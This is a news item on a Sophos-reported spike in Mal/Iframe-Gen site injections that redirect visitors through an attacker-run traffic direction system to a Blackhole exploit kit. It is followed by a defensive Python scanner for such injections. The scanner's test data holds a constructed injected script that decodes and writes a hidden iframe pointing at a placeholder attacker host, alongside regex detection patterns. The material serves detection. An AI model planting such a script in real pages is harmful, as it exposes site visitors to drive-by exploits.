Cybersecurity firm notes spike in TDS attacks
A computer security firm has noted a spike in site defacement attacks caused by Mal/Iframe-Gen, in which legitimate sites are hacked to redirect visitors to malware.

Sophos said the surge started at (UTC+1) Monday (9 a.m. in Manila). "All the affected sites were injected with malicious JavaScript, heavily obfuscated in an attempt to evade detection (as we expect nowadays)," it said in a blog post.

So far, it said, visitors to the infected sites were found to have been redirected to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits.

It said the payload of the injected script writes an iframe to the page and bounces the traffic elsewhere. This bouncing of traffic is commonly known as a Traffic Direction System (TDS). "The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required," it said.

Sophos said much of the iframe traffic was redirected to a page on a freshly registered domain hosted in Germany. However, it said a check of the domain showed the page was unavailable, with all requests getting a 404 error. Later in the day, the TDS server was updated to redirect the traffic to a new destination.

It said this indicates user traffic may have become a commodity. "Once they have injected numerous sites to redirect to their TDS, the attacker can essentially sell that user traffic to interested parties, willing to pay for victims to hit their exploit sites," it said. — TJD, GMA News
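A site owner checking for the kind of injection the article describes (an obfuscated inline script that decodes and writes a hidden iframe) can scan pages for the combination of indicators rather than for any one string. The scanner below is an added example, not code from Sophos or from the article; the HTML it scans is a constructed sample using a hypothetical placeholder domain, and the indicator weights are an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample page (not a real capture): one legitimate script reference
# and one injected script that percent-encodes a hidden iframe and writes it.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<script>var s=unescape('%3Ciframe%20src%3D%22http%3A//tds.example.invalid/in.php%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E');document.write(s);</script>
<script src="/js/app.js"></script>
</body></html>"""

class _ScriptCollector(HTMLParser):
    """Collects the body text of every inline <script> element."""
    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

DOM_WRITE = re.compile(r'document\.write|\.innerHTML\s*=')
DECODER = re.compile(r'\bunescape\(|fromCharCode|\beval\(')
PCT_ESCAPE = re.compile(r'%[0-9A-Fa-f]{2}')
HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*(width\s*=\s*"?[01]\b|height\s*=\s*"?[01]\b'
    r'|visibility\s*:\s*hidden|display\s*:\s*none)', re.IGNORECASE)

def score_script(body):
    """Return (score, hit_names) for one inline script body; one point per indicator."""
    hits = []
    if DOM_WRITE.search(body): hits.append("dom_write")
    if DECODER.search(body): hits.append("decoder")
    if len(PCT_ESCAPE.findall(body)) >= 8: hits.append("percent_escapes")
    decoded = unquote(body)  # reverse unescape()-style %XX encoding before inspecting
    if "<iframe" in decoded.lower(): hits.append("iframe_in_payload")
    if HIDDEN_IFRAME.search(decoded): hits.append("hidden_iframe")
    return len(hits), hits

def find_injected_scripts(html, threshold=3):
    """Flag inline scripts whose indicator count reaches the (assumed) threshold."""
    p = _ScriptCollector()
    p.feed(html); p.close()
    findings = []
    for body in p.scripts:
        if body.strip():
            score, hits = score_script(body)
            if score >= threshold:
                findings.append({"score": score, "hits": hits, "snippet": body[:80]})
    return findings
```

Scripts loaded by `src` have no inline body and are skipped; fetch and scan those separately if the site serves them from the same compromised host.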